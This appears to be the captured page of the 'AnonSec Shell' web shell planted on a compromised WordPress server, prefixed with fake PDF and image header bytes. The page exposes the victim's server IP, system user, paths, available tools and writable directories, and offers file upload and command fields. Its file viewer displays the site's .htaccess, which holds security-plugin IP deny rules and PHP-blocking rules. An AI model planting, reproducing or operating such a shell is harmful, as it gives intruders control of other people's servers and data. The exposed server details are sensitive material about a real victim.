%PDF-1.3 %��C ��C ����"#Qr����&1!A"2qQa��� ?�y,�/3J�ݹ�߲؋5�Xw���y�R��I0�2�PI�I��iM��r�N&"KgX:��nTJnLK��@!�-� ���m�;�g���&�hw���@�ܗ 9�-�.�1 AnonSec Shell
AnonSec Shell
Server IP : 192.175.98.165  /  Your IP : 216.73.216.219
Web Server : Apache
System : Linux server.tobedev.com 4.18.0-553.72.1.el8_10.x86_64 #1 SMP Tue Sep 2 06:07:48 EDT 2025 x86_64
User : meir5web ( 1019)
PHP Version : 7.4.33
Disable Function : passthru,shell_exec
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/meir5web/public_html/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/meir5web/public_html/.htaccess
# BEGIN Solid Security - Ne modifiez pas ou ne supprimez pas cette ligne
# Solid Security Config Details: 2
	# Blocage d’adresses IP - Solid Security > Réglages > Comptes bloqués
	SetEnvIF REMOTE_ADDR "^161\.35\.29\.107$" DenyAccess
	SetEnvIF X-FORWARDED-FOR "^161\.35\.29\.107$" DenyAccess
	SetEnvIF X-CLUSTER-CLIENT-IP "^161\.35\.29\.107$" DenyAccess

	SetEnvIF REMOTE_ADDR "^94\.26\.106\.203$" DenyAccess
	SetEnvIF X-FORWARDED-FOR "^94\.26\.106\.203$" DenyAccess
	SetEnvIF X-CLUSTER-CLIENT-IP "^94\.26\.106\.203$" DenyAccess

	SetEnvIF REMOTE_ADDR "^91\.92\.241\.5$" DenyAccess
	SetEnvIF X-FORWARDED-FOR "^91\.92\.241\.5$" DenyAccess
	SetEnvIF X-CLUSTER-CLIENT-IP "^91\.92\.241\.5$" DenyAccess

	SetEnvIF REMOTE_ADDR "^176\.65\.132\.19$" DenyAccess
	SetEnvIF X-FORWARDED-FOR "^176\.65\.132\.19$" DenyAccess
	SetEnvIF X-CLUSTER-CLIENT-IP "^176\.65\.132\.19$" DenyAccess

	SetEnvIF REMOTE_ADDR "^159\.223\.45\.120$" DenyAccess
	SetEnvIF X-FORWARDED-FOR "^159\.223\.45\.120$" DenyAccess
	SetEnvIF X-CLUSTER-CLIENT-IP "^159\.223\.45\.120$" DenyAccess

	SetEnvIF REMOTE_ADDR "^141\.98\.11\.169$" DenyAccess
	SetEnvIF X-FORWARDED-FOR "^141\.98\.11\.169$" DenyAccess
	SetEnvIF X-CLUSTER-CLIENT-IP "^141\.98\.11\.169$" DenyAccess

	SetEnvIF REMOTE_ADDR "^45\.141\.233\.210$" DenyAccess
	SetEnvIF X-FORWARDED-FOR "^45\.141\.233\.210$" DenyAccess
	SetEnvIF X-CLUSTER-CLIENT-IP "^45\.141\.233\.210$" DenyAccess

	SetEnvIF REMOTE_ADDR "^141\.98\.11\.209$" DenyAccess
	SetEnvIF X-FORWARDED-FOR "^141\.98\.11\.209$" DenyAccess
	SetEnvIF X-CLUSTER-CLIENT-IP "^141\.98\.11\.209$" DenyAccess

	SetEnvIF REMOTE_ADDR "^139\.59\.33\.185$" DenyAccess
	SetEnvIF X-FORWARDED-FOR "^139\.59\.33\.185$" DenyAccess
	SetEnvIF X-CLUSTER-CLIENT-IP "^139\.59\.33\.185$" DenyAccess

	SetEnvIF REMOTE_ADDR "^141\.98\.11\.44$" DenyAccess
	SetEnvIF X-FORWARDED-FOR "^141\.98\.11\.44$" DenyAccess
	SetEnvIF X-CLUSTER-CLIENT-IP "^141\.98\.11\.44$" DenyAccess

	SetEnvIF REMOTE_ADDR "^80\.94\.95\.211$" DenyAccess
	SetEnvIF X-FORWARDED-FOR "^80\.94\.95\.211$" DenyAccess
	SetEnvIF X-CLUSTER-CLIENT-IP "^80\.94\.95\.211$" DenyAccess

	SetEnvIF REMOTE_ADDR "^193\.142\.147\.57$" DenyAccess
	SetEnvIF X-FORWARDED-FOR "^193\.142\.147\.57$" DenyAccess
	SetEnvIF X-CLUSTER-CLIENT-IP "^193\.142\.147\.57$" DenyAccess

	SetEnvIF REMOTE_ADDR "^91\.84\.116\.83$" DenyAccess
	SetEnvIF X-FORWARDED-FOR "^91\.84\.116\.83$" DenyAccess
	SetEnvIF X-CLUSTER-CLIENT-IP "^91\.84\.116\.83$" DenyAccess

	SetEnvIF REMOTE_ADDR "^173\.212\.225\.113$" DenyAccess
	SetEnvIF X-FORWARDED-FOR "^173\.212\.225\.113$" DenyAccess
	SetEnvIF X-CLUSTER-CLIENT-IP "^173\.212\.225\.113$" DenyAccess

	SetEnvIF REMOTE_ADDR "^141\.98\.11\.23$" DenyAccess
	SetEnvIF X-FORWARDED-FOR "^141\.98\.11\.23$" DenyAccess
	SetEnvIF X-CLUSTER-CLIENT-IP "^141\.98\.11\.23$" DenyAccess

	SetEnvIF REMOTE_ADDR "^130\.12\.182\.47$" DenyAccess
	SetEnvIF X-FORWARDED-FOR "^130\.12\.182\.47$" DenyAccess
	SetEnvIF X-CLUSTER-CLIENT-IP "^130\.12\.182\.47$" DenyAccess

	SetEnvIF REMOTE_ADDR "^62\.60\.130\.210$" DenyAccess
	SetEnvIF X-FORWARDED-FOR "^62\.60\.130\.210$" DenyAccess
	SetEnvIF X-CLUSTER-CLIENT-IP "^62\.60\.130\.210$" DenyAccess

	SetEnvIF REMOTE_ADDR "^5\.189\.187\.80$" DenyAccess
	SetEnvIF X-FORWARDED-FOR "^5\.189\.187\.80$" DenyAccess
	SetEnvIF X-CLUSTER-CLIENT-IP "^5\.189\.187\.80$" DenyAccess

	SetEnvIF REMOTE_ADDR "^104\.153\.66\.100$" DenyAccess
	SetEnvIF X-FORWARDED-FOR "^104\.153\.66\.100$" DenyAccess
	SetEnvIF X-CLUSTER-CLIENT-IP "^104\.153\.66\.100$" DenyAccess

	SetEnvIF REMOTE_ADDR "^62\.60\.130\.213$" DenyAccess
	SetEnvIF X-FORWARDED-FOR "^62\.60\.130\.213$" DenyAccess
	SetEnvIF X-CLUSTER-CLIENT-IP "^62\.60\.130\.213$" DenyAccess

	SetEnvIF REMOTE_ADDR "^62\.60\.130\.228$" DenyAccess
	SetEnvIF X-FORWARDED-FOR "^62\.60\.130\.228$" DenyAccess
	SetEnvIF X-CLUSTER-CLIENT-IP "^62\.60\.130\.228$" DenyAccess

	<IfModule mod_authz_core.c>
		<RequireAll>
			Require all granted
			Require not env DenyAccess
			Require not ip 161.35.29.107
			Require not ip 94.26.106.203
			Require not ip 91.92.241.5
			Require not ip 176.65.132.19
			Require not ip 159.223.45.120
			Require not ip 141.98.11.169
			Require not ip 45.141.233.210
			Require not ip 141.98.11.209
			Require not ip 139.59.33.185
			Require not ip 141.98.11.44
			Require not ip 80.94.95.211
			Require not ip 193.142.147.57
			Require not ip 91.84.116.83
			Require not ip 173.212.225.113
			Require not ip 141.98.11.23
			Require not ip 130.12.182.47
			Require not ip 62.60.130.210
			Require not ip 5.189.187.80
			Require not ip 104.153.66.100
			Require not ip 62.60.130.213
			Require not ip 62.60.130.228
		</RequireAll>
	</IfModule>
	<IfModule !mod_authz_core.c>
		Order allow,deny
		Allow from all
		Deny from env=DenyAccess
		Deny from 161.35.29.107
		Deny from 94.26.106.203
		Deny from 91.92.241.5
		Deny from 176.65.132.19
		Deny from 159.223.45.120
		Deny from 141.98.11.169
		Deny from 45.141.233.210
		Deny from 141.98.11.209
		Deny from 139.59.33.185
		Deny from 141.98.11.44
		Deny from 80.94.95.211
		Deny from 193.142.147.57
		Deny from 91.84.116.83
		Deny from 173.212.225.113
		Deny from 141.98.11.23
		Deny from 130.12.182.47
		Deny from 62.60.130.210
		Deny from 5.189.187.80
		Deny from 104.153.66.100
		Deny from 62.60.130.213
		Deny from 62.60.130.228
	</IfModule>

	# Protéger les fichiers système - Solid Security > Réglages > Ajustements système > Fichiers système
	<files .htaccess>
		<IfModule mod_authz_core.c>
			Require all denied
		</IfModule>
		<IfModule !mod_authz_core.c>
			Order allow,deny
			Deny from all
		</IfModule>
	</files>
	<files readme.html>
		<IfModule mod_authz_core.c>
			Require all denied
		</IfModule>
		<IfModule !mod_authz_core.c>
			Order allow,deny
			Deny from all
		</IfModule>
	</files>
	<files readme.txt>
		<IfModule mod_authz_core.c>
			Require all denied
		</IfModule>
		<IfModule !mod_authz_core.c>
			Order allow,deny
			Deny from all
		</IfModule>
	</files>
	<files wp-config.php>
		<IfModule mod_authz_core.c>
			Require all denied
		</IfModule>
		<IfModule !mod_authz_core.c>
			Order allow,deny
			Deny from all
		</IfModule>
	</files>

	# Désactiver l’exploration des répertoires - Solid Security > Réglages > Ajustements système > Exploration des répertoires
	Options -Indexes

	<IfModule mod_rewrite.c>
		RewriteEngine On

		# Protéger les fichiers système - Solid Security > Réglages > Ajustements système > Fichiers système
		RewriteRule ^wp-admin/install\.php$ - [F]
		RewriteRule ^wp-admin/includes/ - [F]
		RewriteRule !^wp-includes/ - [S=3]
		RewriteRule ^wp-includes/[^/]+\.php$ - [F]
		RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F]
		RewriteRule ^wp-includes/theme-compat/ - [F]
		RewriteRule (^|.*/)\.(git|svn) - [F]

		# Désactiver PHP dans le répertoire « Uploads » - Solid Security > Réglages > Ajustements système > PHP dans Uploads
		RewriteRule ^wp\-content/uploads/.*\.(?:php[1-7]?|pht|phtml?|phps)\.?$ - [NC,F]

		# Désactivez PHP dans les extensions - iThemes Security > Réglages > Ajustements système > PHP dans les extensions
		RewriteRule ^wp\-content/plugins/.*\.(?:php[1-7]?|pht|phtml?|phps)\.?$ - [NC,F]

		# Désactivez PHP dans les thèmes - iThemes Security > Réglages > Ajustements système > PHP dans les thèmes
		RewriteRule ^wp\-content/themes/.*\.(?:php[1-7]?|pht|phtml?|phps)\.?$ - [NC,F]
	</IfModule>
# END Solid Security - Ne modifiez pas ou ne supprimez pas cette ligne

ErrorDocument 401 default
# BEGIN WordPress
# Les directives (lignes) entre « BEGIN WordPress » et « END WordPress » sont générées
# dynamiquement, et doivent être modifiées uniquement via les filtres WordPress.
# Toute modification des directives situées entre ces marqueurs sera surchargée.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteRule .* - [E=HTTP_AUTHORIZATION:%{HTTP:Authorization}]
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>

# END WordPress
<IfModule mime_module>
AddHandler application/x-httpd-ea-php74 .php .php7 .phtml

</IfModule>

# php -- BEGIN cPanel-generated handler, do not edit
# Set the “ea-php74” package as the default “PHP” programming language.
<IfModule mime_module>
  AddHandler application/x-httpd-ea-php74 .php .php7 .phtml
</IfModule>
# php -- END cPanel-generated handler, do not edit

Anon7 - 2022
AnonSec Team